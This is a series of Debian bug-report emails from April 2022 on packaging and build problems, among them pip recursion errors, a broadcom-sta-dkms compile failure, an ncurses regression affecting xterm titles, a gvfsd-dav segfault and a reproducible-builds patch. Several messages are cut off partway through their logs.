Followup-For: Bug #1010148
Control: tags -1 patch

Dear Maintainer,

sorry, I don't know why can attach patch if `repotbug --mutt`?
send patch again.


--
Kind regards,

Manuel Bilderbeek

Bug#1010283: Duplicate

2022-04-27 Thread Kamil Jońca 


I somehow overlooked, that my bug sems to be  duplicate of
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010240

Sorry for that.
KJ
-- 
http://wolnelektury.pl/wesprzyj/teraz/

Bug#1009658: RFS: ncdu/1.16-0.1 [NMU] -- ncurses disk usage viewer

2022-04-27 Thread Geert Stappers 
On Wed, Apr 27, 2022 at 04:40:19PM +0200, Santiago Ruano Rincón wrote:
> Control: tags 1009658 + pending

Good

 
> El 27/04/22 a las 14:47, Christian Göttsche escribió:
> > > I'd prefer to have a more verbose description about what that update on
> > > Build-Deps means. This is just a personal preference.
> > > Would you like to give a little more detail please?
> > 
> > Uploaded a new version with a more detailed changelog:
> > 
> > ncdu (1.16-0.1) unstable; urgency=medium
> >  .
> >* Non-maintainer upload.
> >* New upstream version 1.16 (Closes: #996240)
> >* d/control:
> >  - update build dependencies
> >+ replace transitional libncurses5-dev and libncursesw5-dev by
> >  libncurses-dev
> >+ add pkg-config for successful autoreconf
> >+ drop autotools-dev, default since debhelper compat 10
> >  - bump to debhelper compat 13
> >  - bump to std-ver 4.6.0 (no further changes)
> >  - set Rules-Requires-Root no
> >  - use https homepage address
> >* d/patches: cherry-pick upstream commits
> >  - Add dark-bg color scheme + enable colors by default if !NO_COLOR
> >(Closes: #894380)
> >  - Make options, keys and file flags bold in man page
> >  - dir_scan: fix wrong assumption that errno can only be changed by
> >readdir()
> >  - dir_scan: call strlen only once
> >* d/rules: enable hardening and LTO
> >* d/u/metadata: add basic metadata
> > 
> 
> Uploaded to DELAYED/10.
> 
> Thanks for your work!
> 
>  -- Santiago

Thank you for the upload.


Groeten
Geert Stappers
Did not understand
> >* New upstream version 1.16
versus
> >* d/patches: cherry-pick upstream commits
-- 
Silence is hard to parse

Bug#1010284: python3-pip: runs into infinite loop when installing package with pyproject.toml file

2022-04-27 Thread Julian Gilbey 
Package: python3-pip
Version: 22.0.2+dfsg-1
Severity: important

I found this issue with my local Python project since I just upgraded
my testing system to python3 3.10.4-1, which now makes python3.10 the
default Python.

I then tested with this simple example repository:
https://github.com/pypa/sampleproject

Steps to reproduce:
1. Clone the above repository
2. Run `pip3 install --user .`

This is the result I observe:

Processing /<...>/sampleproject
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: peppercorn in 
/home/jdg/.local/lib/python3.10/site-packages (from sampleproject==2.0.0) (0.6)
Building wheels for collected packages: sampleproject
  Building wheel for sampleproject (pyproject.toml) ... error
  error: subprocess-exited-with-error
  
 × Building wheel for sampleproject (pyproject.toml) did not run successfully.
  │ exit code: 1
  ╰─> [2011 lines of output]
  running bdist_wheel
  running build
  running build_py
  running install
  Traceback (most recent call last):
File 
"/usr/lib/python3/dist-packages/setuptools/_distutils/command/install.py", line 
94, in _load_sysconfig_schemes
  for scheme in sysconfig.get_scheme_names()
File "/usr/lib/python3.10/sysconfig.py", line 583, in get_scheme_names
  return tuple(sorted(_INSTALL_SCHEMES))
  RecursionError: maximum recursion depth exceeded while calling a Python 
object
  
  During handling of the above exception, another exception occurred:
  
  Traceback (most recent call last):
File 
"/usr/lib/python3/dist-packages/pip/_vendor/pep517/in_process/_in_process.py", 
line 363, in 
  main()
File 
"/usr/lib/python3/dist-packages/pip/_vendor/pep517/in_process/_in_process.py", 
line 345, in main
  json_out['return_val'] = hook(**hook_input['kwargs'])
File 
"/usr/lib/python3/dist-packages/pip/_vendor/pep517/in_process/_in_process.py", 
line 261, in build_wheel
  return _build_backend().build_wheel(wheel_directory, config_settings,
File "/usr/lib/python3/dist-packages/setuptools/build_meta.py", line 
230, in build_wheel
  return self._build_with_temp_dir(['bdist_wheel'], '.whl',
File "/usr/lib/python3/dist-packages/setuptools/build_meta.py", line 
215, in _build_with_temp_dir
  self.run_setup()
   File "/usr/lib/python3/dist-packages/setuptools/build_meta.py", line 
158, in run_setup
  exec(compile(code, __file__, 'exec'), locals())
File "setup.py", line 20, in 
  setup(
File "/usr/lib/python3/dist-packages/setuptools/__init__.py", line 153, 
in setup
  return distutils.core.setup(**attrs)
File "/usr/lib/python3/dist-packages/setuptools/_distutils/core.py", 
line 148, in setup
  return run_commands(dist)
File "/usr/lib/python3/dist-packages/setuptools/_distutils/core.py", 
line 163, in run_commands
  dist.run_commands()
File "/usr/lib/python3/dist-packages/setuptools/_distutils/dist.py", 
line 967, in run_commands
  self.run_command(cmd)
File "/usr/lib/python3/dist-packages/setuptools/_distutils/dist.py", 
line 986, in run_command
  cmd_obj.run()
File "/usr/lib/python3/dist-packages/wheel/bdist_wheel.py", line 335, 
in run
  self.run_command('install')
File "/usr/lib/python3/dist-packages/setuptools/_distutils/cmd.py", 
line 313, in run_command
  self.distribution.run_command(command)
File "/usr/lib/python3/dist-packages/setuptools/_distutils/dist.py", 
line 985, in run_command
  cmd_obj.ensure_finalized()
File "/usr/lib/python3/dist-packages/setuptools/_distutils/cmd.py", 
line 107, in ensure_finalized
  self.finalize_options()
File "/usr/lib/python3/dist-packages/setuptools/command/install.py", 
line 45, in finalize_options
  orig.install.finalize_options(self)
File 
"/usr/lib/python3/dist-packages/setuptools/_distutils/command/install.py", line 
320, in finalize_options
  self.finalize_unix()
File "/usr/lib/python3.10/_distutils_system_mod.py", line 59, in 
finalize_unix
  super().finalize_unix()
File 
"/usr/lib/python3/dist-packages/setuptools/_distutils/command/install.py", line 
488, in finalize_unix
  self.select_scheme("posix_prefix")
File "/usr/lib/python3.10/_distutils_system_mod.py", line 55, in 
select_scheme
  super().select_scheme(name)
File 
"/usr/lib/python3/dist-packages/setuptools/_distutils/command/install.py", line 
522, in select_scheme
  scheme = _load_schemes()[name]
File "/usr/lib/python3.10/_distutils_system_mod.py", line 137, in 
wrapped_load_schemes
  _inject_headers(name, scheme)
File "/usr/lib/python3.10/_distutils_system_mod.py", line 125, in 
_inject_headers

Bug#1010283: broadcom-sta-dkms: Modules does not compile under kernel 5.17

2022-04-27 Thread kjonca 
Package: broadcom-sta-dkms
Version: 6.30.223.271-17
Severity: grave
Justification: renders package unusable

Dear Maintainer,

*** Reporter, please consider answering these questions, where appropriate ***

   * What led up to the situation?
Installing linux-image-5.17.0-1-amd64
   * What exactly did you do (or not do) that was effective (or
 ineffective)?
Try to install packege above
   * What was the outcome of this action?
Compilation error, file attached.
   * What outcome did you expect instead?
Working driver



-- System Information:
Debian Release: bookworm/sid
  APT prefers oldoldstable
  APT policy: (500, 'oldoldstable'), (500, 'unstable'), (500, 'oldstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 5.16.0-6-amd64 (SMP w/4 CPU threads; PREEMPT)
Kernel taint flags: TAINT_PROPRIETARY_MODULE, TAINT_OOT_MODULE, 
TAINT_UNSIGNED_MODULE
Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8), 
LANGUAGE=en_GB:en
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages broadcom-sta-dkms depends on:
ii  dkms  3.0.3-1

Versions of packages broadcom-sta-dkms recommends:
ii  wireless-tools  30~pre9-13.1

broadcom-sta-dkms suggests no packages.

-- debconf-show failed
DKMS make.log for broadcom-sta-6.30.223.271 for kernel 5.17.0-1-amd64 (x86_64)
Wed 27 Apr 20:32:11 CEST 2022
CFG80211 API is prefered for this kernel version
Makefile:89: Neither CFG80211 nor Wireless Extension is enabled in kernel
KBUILD_NOPEDANTIC=1 make -C /lib/modules/5.17.0-1-amd64/build M=`pwd`
make[1]: warning: jobserver unavailable: using -j1.  Add '+' to parent make 
rule.
make[1]: Entering directory '/usr/src/linux-headers-5.17.0-1-amd64'
warning: the compiler differs from the one used to build the kernel
  The kernel was built by: gcc-11 (Debian 11.2.0-20) 11.2.0
  You are using:   gcc-11 (Debian 11.3.0-1) 11.3.0
CFG80211 API is prefered for this kernel version
Using CFG80211 API
Kernel architecture is X86_64
  CC [M]  /var/lib/dkms/broadcom-sta/6.30.223.271/build/src/shared/linux_osl.o
  CC [M]  /var/lib/dkms/broadcom-sta/6.30.223.271/build/src/wl/sys/wl_linux.o
In file included from 
/var/lib/dkms/broadcom-sta/6.30.223.271/build/src/wl/sys/wl_linux.c:81:
/var/lib/dkms/broadcom-sta/6.30.223.271/build/src/wl/sys/wl_iw.h:73: warning: 
"isprint" redefined
   73 | #define isprint(c) bcm_isprint(c)
  | 
In file included from 
/usr/src/linux-headers-5.17.0-1-common/include/linux/string_helpers.h:6,
 from 
/usr/src/linux-headers-5.17.0-1-common/include/linux/seq_file.h:7,
 from 
/usr/src/linux-headers-5.17.0-1-common/include/linux/seq_file_net.h:5,
 from 
/usr/src/linux-headers-5.17.0-1-common/include/net/net_namespace.h:183,
 from 
/usr/src/linux-headers-5.17.0-1-common/include/linux/netdevice.h:37,
 from 
/var/lib/dkms/broadcom-sta/6.30.223.271/build/src/include/linuxver.h:69,
 from 
/var/lib/dkms/broadcom-sta/6.30.223.271/build/src/wl/sys/wl_linux.c:27:
/usr/src/linux-headers-5.17.0-1-common/include/linux/ctype.h:30: note: this is 
the location of the previous definition
   30 | #define isprint(c)  ((__ismask(c)&(_P|_U|_L|_D|_SP)) != 0)
  | 
In file included from 
/var/lib/dkms/broadcom-sta/6.30.223.271/build/src/include/osl.h:79,
 from 
/var/lib/dkms/broadcom-sta/6.30.223.271/build/src/wl/sys/wl_linux.c:28:
/var/lib/dkms/broadcom-sta/6.30.223.271/build/src/wl/sys/wl_linux.c: In 
function ‘wl_attach’:
/var/lib/dkms/broadcom-sta/6.30.223.271/build/src/wl/sys/wl_linux.c:650:43: 
warning: passing argument 1 of ‘memcpy’ discards ‘const’ qualifier from pointer 
target type [-Wdiscarded-qualifiers]
  650 | bcopy(>pub->cur_etheraddr, dev->dev_addr, ETHER_ADDR_LEN);
/var/lib/dkms/broadcom-sta/6.30.223.271/build/src/include/linux_osl.h:156:49: 
note: in definition of macro ‘bcopy’
  156 | #define bcopy(src, dst, len)memcpy((dst), (src), (len))
  | ^~~
In file included from 
/usr/src/linux-headers-5.17.0-1-common/include/linux/string.h:253,
 from 
/usr/src/linux-headers-5.17.0-1-common/include/linux/bitmap.h:11,
 from 
/usr/src/linux-headers-5.17.0-1-common/include/linux/cpumask.h:12,
 from 
/usr/src/linux-headers-5.17.0-1-common/arch/x86/include/asm/cpumask.h:5,
 from 
/usr/src/linux-headers-5.17.0-1-common/arch/x86/include/asm/msr.h:11,
 from 
/usr/src/linux-headers-5.17.0-1-common/arch/x86/include/asm/processor.h:22,
 from 
/usr/src/linux-headers-5.17.0-1-common/arch/x86/include/asm/timex.h:5,
 from 
/usr/src/linux-headers-5.17.0-1-common/include/linux/timex.h:65,
 from 
/usr/src/linux-headers-5.17.0-1-common/include/linux/time32.h:13,
 from

Bug#1010270: Recent update break xterm

2022-04-27 Thread Klaus Ethgen 
hi,

Am Mi den 27. Apr 2022 um 19:28 schrieb Sven Joachim:
> Am 27.04.2022 um 18:25 schrieb Klaus Ethgen:
> 
> > Am Mi den 27. Apr 2022 um 15:49 schrieb Sven Joachim:
> >> > Package: libtinfo5
> >> > Version: 6.3+20220423-1
> >> > Severity: normal
> >> >
> >> > Since the last update of this package, applications running inside of
> >> > xterm are not always able to update the window title.
> >> >
> >> > Instead, control output are breaking the layout of the application.
> >> >
> >> > Broken Applications:
> >> > - mutt
> >> > - cmus
> >> >
> >> > Still working:
> >> > - zsh
> >>
> >> Can you give steps to reproduce what is broken?  Also, which version of
> >> xterm do you use, and what is the value of the TERM environment
> >> variable?
> >
> > ~> dpkg -l xterm
> > ii  xterm  372-1amd64X terminal emulator
> > ~> echo $TERM
> > xterm-256color
> >
> > For cmus, just use it, it should show the title of the current song in
> > the title of your terminal.
> >
> > Same for mutt. It should show the message count in title ans some more
> > infomations.
> 
> Not in its default configuration, you need to have "set ts_enabled=yes"
> in your muttrc file.  With that I can confirm the problem.

Well, yes, in default configuration. I do not have ts_enabled set
anywhere in my mut configuration:
~> grep ts_enabled .mutt/*
~> grep ts_enabled /etc/Muttrc
~> grep ts_enabled /etc/Muttrc.d/*

> Two workarounds: set TERM=xterm-p370, _or_ downgrade ncurses-base to
> 6.3-2, I recommend the latter.

Yes, could also be ncurses-base. It was also upgraded the same time.

Gruß
   Klaus
-- 
Klaus Ethgen   http://www.ethgen.ch/
pub  4096R/4E20AF1C 2011-05-16Klaus Ethgen 
Fingerprint: 85D4 CA42 952C 949B 1753  62B3 79D0 B06F 4E20 AF1C


signature.asc
Description: PGP signature

Bug#1010282: gvfsd-dav: segfaults when mounting a share

2022-04-27 Thread Yves-Alexis Perez 
Package: gvfs-backends
Version: 1.50.0-1
Severity: important

Hi,

I'm currently experiencing a segfault in gvfs-dav when mounting a share
(using gio mount davs:///remote.php/dav/corsac on a Nextcloud
instance).

I only started experiencing the issue now but it's been a while since I
tried to mount using gio so I'm unsure when it started appearing.

Running gvfsd from a terminal with GVFS_DEBUG=1 I get:

dav: Added new job source 0x64a7363fc080 (GVfsBackendDav)
dav: Queued new job 0x64a7363f4a70 (GVfsJobMount)
dav: + mount
dav: + soup_authenticate (interactive, first auth)
dav: - soup_authenticate
dav:  [/remote.php/dav/files/corsac] webdav: 1, collection 1 [res: 1]

Adding GVFS_HTTP_DEBUG=all I get at the end:

> PROPFIND /remote.php/dav/files/ HTTP/1.1
[...]
> 
>  
>   
> 
> 
>   
>  

< HTTP/1.1 405 Method Not Allowed
< Soup-Debug-Timestamp: 1651085719
< Soup-Debug: SoupMessage 2 (0x784f50007210)
< Date: Wed, 27 Apr 2022 18:55:19 GMT
< Server: nginx/1.18.0
< Content-Type: application/xml; charset=utf-8
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Content-Security-Policy: default-src 'none';
< Vary: Brief,Prefer
< Referrer-Policy: no-referrer
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< X-XSS-Protection: 1; mode=block
< Keep-Alive: timeout=5, max=97
< Connection: Keep-Alive
< Transfer-Encoding: chunked
< Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
< DAV: 1, 3, extended-mkcol, access-control, 
calendarserver-principal-property-search, nc-calendar-search, 
nc-enable-birthday-calendar
< Allow: OPTIONS, GET, HEAD, DELETE, PROPFIND, PUT, PROPPATCH, COPY, MOVE, 
REPORT
< X-Download-Options: noopen
< X-Permitted-Cross-Domain-Policies: none
< X-Robots-Tag: none
<
< 
< http://sabredav.org/ns;>
<   Sabre\DAV\Exception\MethodNotAllowed
<   Listing members of this collection is disabled
< 
dav:  [/remote.php/dav/files/] webdav: 1, collection 0 [res: 0]
dav: send_reply(0x57419e1afab0), failed=0 ()
malloc(): unsorted double linked list corrupted


I'm not sure why gvfs-dav tries to access /remote.php/dav/files/ but in
any case it should crash on receiving a 405 error. Also I'm a bit
worried about the malloc error, memory corruption is bad.

I've installed some debugging symbols and try to get a backtrace but I'm
unsure if it's really helpful:

corsac@scapa: gdb -p 874753
GNU gdb (Debian 10.1-2+b1) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
.
Find the GDB manual and other documentation resources online at:
.

For help, type "help".
Type "apropos word" to search for commands related to "word".
Attaching to process 874753
[New LWP 874754]
[New LWP 874755]
[New LWP 874756]
[New LWP 874758]
[New LWP 874759]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
0x71c244b9a87f in __GI___poll (fds=0x5f89614d0600, nfds=1, timeout=-1) at 
../sysdeps/unix/sysv/linux/poll.c:29
29  ../sysdeps/unix/sysv/linux/poll.c: No such file or directory.
(gdb) c
Continuing.

Thread 5 "pool" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x71c23b7fe640 (LWP 874758)]
__strncmp_avx2 () at ../sysdeps/x86_64/multiarch/strcmp-avx2.S:115
115 ../sysdeps/x86_64/multiarch/strcmp-avx2.S: No such file or directory.
(gdb) bt
#0  __strncmp_avx2 () at ../sysdeps/x86_64/multiarch/strcmp-avx2.S:115
#1  0x71c244e9441e in soup_body_input_stream_read_chunked
(error=0x71c23b7fda18, cancellable=0x0, blocking=1, count=4096, buffer=0x0, 
bistream=0x71c22835ec90 [SoupBodyInputStream])
at ../libsoup/http1/soup-body-input-stream.c:234
#2  read_internal (stream=, buffer=0x0, count=4096, blocking=1, 
cancellable=0x0, error=0x71c23b7fda18)
at ../libsoup/http1/soup-body-input-stream.c:267
#3  0x71c24510a271 in g_input_stream_skip
(stream=0x71c22835ec90 [SoupBodyInputStream], count=count@entry=4096, 
cancellable=cancellable@entry=0x0, error=error@entry=0x71c23b7fda18)
at ../../../gio/ginputstream.c:391
#4  0x71c244eae4ba in soup_filter_input_stream_skip (stream=, count=4096, cancellable=0x0, error=0x71c23b7fda18)
at ../libsoup/soup-filter-input-stream.c:131
#5  0x71c244eaa2af in soup_client_input_stream_skip (stream=0x71c2284c4f20 
[SoupClientInputStream], count=4096, cancellable=0x0, error=0x71c23b7fda18)
at ../libsoup/soup-client-input-stream.c:140
#6  0x71c24510a271 in g_input_stream_skip

Bug#1010278: xterm_set_titles is broken

2022-04-27 Thread Sven Joachim 
On 2022-04-27 19:00 +0200, Marco d'Itri wrote:

> Package: mutt
> Version: 2.2.3-1
> Severity: normal
>
> Since 2.2.3-1 xterm_set_titles prints garbage on the screen.
> I see that this option is not documented, so I suppose that it has been
> deprecated over the years.
> But even with ts_enabled=yes (the default) the terminal status bar is
> not being updated (I checked both gnome-terminal and xterm).

This is probably due to a recent change in ncurses rather than the new
mutt version, see #1010270.

Can you confirm that the problem goes away with TERM=xterm-p370, or
after downgrading ncurses-base to 6.3-2?

Cheers,
   Sven

Bug#636343: libnotify-bin: Add support for hint of type boolean

2022-04-27 Thread Marco Trevisan 
While specific boolean typed hints can't be created, transient
hint can be set with

  notify-send 'Transient test' 'Yeppp' --hint=int:transient:1

Bug#1008823: transition: thrift

2022-04-27 Thread Sebastian Ramacher 
On 2022-04-26 10:11:34 +0200, Sebastian Ramacher wrote:
> Hi
> 
> On 2022-04-19 14:12:33, Sebastian Ramacher wrote:
> > Control: tags -1 confirmed
> > Control: forwarded -1 
> > https://release.debian.org/transitions/html/auto-thrift.html
> > 
> > On 2022-04-02 11:48:40, László Böszörményi wrote:
> > > Package: release.debian.org
> > > Severity: normal
> > > User: release.debian@packages.debian.org
> > > Usertags: transition
> > > 
> > > Hi RMs,
> > > 
> > > A quick transition of thrift from 0.13.0 to 0.16.0 as the only reverse
> > > build dependency is gnuradio. It builds with the new thrift version as
> > > well.
> > 
> > Please go ahead
> 
> Please ensure in the next upload that libthrift-0.16.0 and
> libthrift-c-glib0 are in Section libs. This will ensure that for the
> next thrift transition britney can perform a smooth update.

Thanks!

thrift migrated and the old binary packages got removed.

Cheers
-- 
Sebastian Ramacher

Bug#1010281: ldc: FTBFS on armhf and i386

2022-04-27 Thread Sebastian Ramacher 
Source: ldc
Version: 1:1.29.0-1
Severity: serious
Tags: ftbfs
Justification: fails to build from source (but built successfully in the past)
X-Debbugs-Cc: sramac...@debian.org

ldc FTBFS on armhf and i386:

[ 80%] Generating objects-shared/core/atomic.o, 
objects-shared/core/attribute.o, objects-shared/core/bitop.o, 
objects-shared/core/builtins.o, objects-shared/core/checkedint.o, 
objects-shared/core/cpuid.o, objects-shared/core/demangle.o, 
objects-shared/core/exception.o, objects-shared/core/gc/config.o, 
objects-shared/core/gc/gcinterface.o, objects-shared/core/gc/registry.o, 
objects-shared/core/int128.o, objects-shared/core/internal/abort.o, 
objects-shared/core/internal/array/appending.o, 
objects-shared/core/internal/array/capacity.o, 
objects-shared/core/internal/array/casting.o, 
objects-shared/core/internal/array/comparison.o, 
objects-shared/core/internal/array/concatenation.o, 
objects-shared/core/internal/array/construction.o, 
objects-shared/core/internal/array/equality.o, 
objects-shared/core/internal/array/operations.o, 
objects-shared/core/internal/array/utils.o, 
objects-shared/core/internal/atomic.o, 
objects-shared/core/internal/attributes.o, 
objects-shared/core/internal/backtrace/dwarf.o, 
objects-shared/core/internal/backtrace/elf.o, 
objects-shared/core/internal/backtrace/handler.o, 
objects-shared/core/internal/backtrace/libunwind.o, 
objects-shared/core/internal/backtrace/macho.o, 
objects-shared/core/internal/backtrace/unwind.o, 
objects-shared/core/internal/container/array.o, 
objects-shared/core/internal/container/common.o, 
objects-shared/core/internal/container/hashtab.o, 
objects-shared/core/internal/container/treap.o, 
objects-shared/core/internal/convert.o, objects-shared/core/internal/dassert.o, 
objects-shared/core/internal/destruction.o, 
objects-shared/core/internal/elf/dl.o, objects-shared/core/internal/elf/io.o, 
objects-shared/core/internal/entrypoint.o, 
objects-shared/core/internal/execinfo.o, 
objects-shared/core/internal/gc/bits.o, 
objects-shared/core/internal/gc/impl/conservative/gc.o, 
objects-shared/core/internal/gc/impl/manual/gc.o, 
objects-shared/core/internal/gc/impl/proto/gc.o, 
objects-shared/core/internal/gc/os.o, 
objects-shared/core/internal/gc/pooltable.o, 
objects-shared/core/internal/gc/proxy.o, objects-shared/core/internal/hash.o, 
objects-shared/core/internal/lifetime.o, objects-shared/core/internal/moving.o, 
objects-shared/core/internal/parseoptions.o, 
objects-shared/core/internal/postblit.o, objects-shared/core/internal/qsort.o, 
objects-shared/core/internal/spinlock.o, objects-shared/core/internal/string.o, 
objects-shared/core/internal/switch_.o, objects-shared/core/internal/traits.o, 
objects-shared/core/internal/utf.o, objects-shared/core/internal/util/array.o, 
objects-shared/core/internal/util/math.o, 
objects-shared/core/internal/vararg/aarch64.o, 
objects-shared/core/internal/vararg/sysv_x64.o, objects-shared/core/lifetime.o, 
objects-shared/core/math.o, objects-shared/core/memory.o, 
objects-shared/core/runtime.o, objects-shared/core/simd.o, 
objects-shared/core/stdc/assert_.o, objects-shared/core/stdc/complex.o, 
objects-shared/core/stdc/config.o, objects-shared/core/stdc/ctype.o, 
objects-shared/core/stdc/errno.o, objects-shared/core/stdc/fenv.o, 
objects-shared/core/stdc/float_.o, objects-shared/core/stdc/inttypes.o, 
objects-shared/core/stdc/limits.o, objects-shared/core/stdc/locale.o, 
objects-shared/core/stdc/math.o, objects-shared/core/stdc/signal.o, 
objects-shared/core/stdc/stdarg.o, objects-shared/core/stdc/stddef.o, 
objects-shared/core/stdc/stdint.o, objects-shared/core/stdc/stdio.o, 
objects-shared/core/stdc/stdlib.o, objects-shared/core/stdc/string.o, 
objects-shared/core/stdc/tgmath.o, objects-shared/core/stdc/time.o, 
objects-shared/core/stdc/wchar_.o, objects-shared/core/stdc/wctype.o, 
objects-shared/core/stdcpp/allocator.o, objects-shared/core/stdcpp/array.o, 
objects-shared/core/stdcpp/exception.o, objects-shared/core/stdcpp/memory.o, 
objects-shared/core/stdcpp/new_.o, objects-shared/core/stdcpp/string.o, 
objects-shared/core/stdcpp/string_view.o, 
objects-shared/core/stdcpp/type_traits.o, 
objects-shared/core/stdcpp/typeinfo.o, objects-shared/core/stdcpp/utility.o, 
objects-shared/core/stdcpp/vector.o, objects-shared/core/stdcpp/xutility.o, 
objects-shared/core/sync/barrier.o, objects-shared/core/sync/condition.o, 
objects-shared/core/sync/config.o, objects-shared/core/sync/event.o, 
objects-shared/core/sync/exception.o, objects-shared/core/sync/mutex.o, 
objects-shared/core/sync/rwmutex.o, objects-shared/core/sync/semaphore.o, 
objects-shared/core/thread/context.o, objects-shared/core/thread/fiber.o, 
objects-shared/core/thread/osthread.o, objects-shared/core/thread/package.o, 
objects-shared/core/thread/threadbase.o, 
objects-shared/core/thread/threadgroup.o, objects-shared/core/thread/types.o, 
objects-shared/core/time.o, objects-shared/core/vararg.o, 
objects-shared/core/volatile.o,

Bug#1010270: Recent update break xterm

2022-04-27 Thread Sven Joachim 
Control: reassign -1 ncurses-base 6.3+20220423-1

Please keep the bug report CC'ed.

Am 27.04.2022 um 18:25 schrieb Klaus Ethgen:

> Am Mi den 27. Apr 2022 um 15:49 schrieb Sven Joachim:
>> > Package: libtinfo5
>> > Version: 6.3+20220423-1
>> > Severity: normal
>> >
>> > Since the last update of this package, applications running inside of
>> > xterm are not always able to update the window title.
>> >
>> > Instead, control output are breaking the layout of the application.
>> >
>> > Broken Applications:
>> > - mutt
>> > - cmus
>> >
>> > Still working:
>> > - zsh
>>
>> Can you give steps to reproduce what is broken?  Also, which version of
>> xterm do you use, and what is the value of the TERM environment
>> variable?
>
> ~> dpkg -l xterm
> ii  xterm  372-1amd64X terminal emulator
> ~> echo $TERM
> xterm-256color
>
> For cmus, just use it, it should show the title of the current song in
> the title of your terminal.
>
> Same for mutt. It should show the message count in title ans some more
> infomations.

Not in its default configuration, you need to have "set ts_enabled=yes"
in your muttrc file.  With that I can confirm the problem.

Two workarounds: set TERM=xterm-p370, _or_ downgrade ncurses-base to
6.3-2, I recommend the latter.

Cheers,
   Sven

Bug#1010280: gnome-terminal: gnome terminal re-scales after toggling fullscreen mode

2022-04-27 Thread zktosu 
Package: gnome-terminal
Version: 3.44.0-1
Severity: minor
Tags: a11y
X-Debbugs-Cc: zkt...@gmail.com

Dear Maintainer,


   * What led up to the situation?
making gnome-terminal window fullscreen then normal again


I am not sure if it is related or not but I have changed bash to zsh.


-- System Information:
Debian Release: bookworm/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 5.10.0-8-amd64 (SMP w/8 CPU threads)
Kernel taint flags: TAINT_PROPRIETARY_MODULE, TAINT_FIRMWARE_WORKAROUND, 
TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), 
LANGUAGE=en_US:en
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gnome-terminal depends on:
ii  dbus-user-session [default-dbus-session-bus]  1.14.0-1
ii  dbus-x11 [dbus-session-bus]   1.14.0-1
ii  dconf-gsettings-backend [gsettings-backend]   0.40.0-3
ii  gnome-terminal-data   3.44.0-1
ii  gsettings-desktop-schemas 42.0-1
ii  libatk1.0-0   2.38.0-1
ii  libc6 2.33-7
ii  libdconf1 0.40.0-3
ii  libgcc-s1 12-20220319-1
ii  libglib2.0-0  2.72.1-1
ii  libgtk-3-03.24.33-1
ii  libpango-1.0-01.50.6+ds-2
ii  libstdc++612-20220319-1
ii  libuuid1  2.38-4
ii  libvte-2.91-0 0.68.0-1+b1
ii  libx11-6  2:1.7.5-1

Versions of packages gnome-terminal recommends:
ii  gvfs   1.50.0-1
ii  nautilus-extension-gnome-terminal  3.44.0-1
ii  yelp   42.1-1

gnome-terminal suggests no packages.

-- no debconf information

Bug#1010275: ITP: rust-bls-dkg -- BLS DKG mechanism

2022-04-27 Thread Jonas Smedegaard 
Needs crate rand-0.7 (or safe-network needs to support newer bls-dkg).

Newest bls_dkg is v0.10, which needs rand v0.8, which is in Debian.

But newest safe-network needs bls_dkg v0.9, which needs rand v0.7, which 
is not in Debian.

Packaging this project is therefore stalled: Waits for either rand v0.7 
to appear in Debian, or for safe-network to depend on crates tied to 
rand v0.8 (not rand v0.7).


 - Jonas

-- 
 * Jonas Smedegaard - idealist & Internet-arkitekt
 * Tlf.: +45 40843136  Website: http://dr.jones.dk/

 [x] quote me freely  [ ] ask before reusing  [ ] keep private

signature.asc
Description: signature

Bug#1010279: python-iso8601: please make the build reproducible

2022-04-27 Thread Chris Lamb 
Source: python-iso8601
Version: 1.0.2-1
Severity: wishlist
Tags: patch
User: reproducible-bui...@lists.alioth.debian.org
Usertags: randomness
X-Debbugs-Cc: reproducible-b...@lists.alioth.debian.org

Hi,

Whilst working on the Reproducible Builds effort [0] we noticed that
python-iso8601 could not be built reproducibly.

This is because it did not clean up some pytest cache directories
properly under .pybuild/ and then that got installed into the binary
package. A patch to this package is attached, although the bug might
really be in pytest itself; I defer to your judgement. :)

 [0] https://reproducible-builds.org/


Regards,

-- 
  ,''`.
 : :'  : Chris Lamb
 `. `'`  la...@debian.org / chris-lamb.co.uk
   `-

--- a/debian/rules  2022-04-27 10:44:36.901334155 -0700
--- b/debian/rules  2022-04-27 10:49:32.975212375 -0700
@@ -4,3 +4,6 @@
 
 %:
dh $@ --buildsystem=pybuild --with python3
+
+execute_after_dh_auto_test:
+   find -type d -name .pytest_cache -print0 | xargs -0r rm -rfv

Bug#973755: git-buildpackage: gbp clone and import-* should defuse git attributes

2022-04-27 Thread Christoph Berg 
> Quite a lot of packages ship .gitattributes in their tarballs, leading
> to strange effects while building packages and, most importantly,
> leading to the imports not creating Git trees identical to the tarballs.

rdkit was also affected by this. I ended up doing "gbp import-orig
--filter .gitattributes $tarball", but this will have to be remembered
on every future tarball import.

https://salsa.debian.org/debichem-team/rdkit/-/commit/6e8b2f28c07ea515be9549b92e975acf9d25c99b

> A remedy to this would be git-buildpackage creating .git/info/attributes
> with this content:
> 
> * -text -eol -crlf -ident -filter -working-tree-encoding
> 
> This disables any transformation of the version-controlled file.
> 
> Even better would be if gbp created the Git trees manually using
> low-level Git commands which don’t take Git attributes into account.

Is that enough? Any later git command will still mangle the files if
that .gitattributes file is still present.

Maybe it's not a problem since only files in debian/ should be
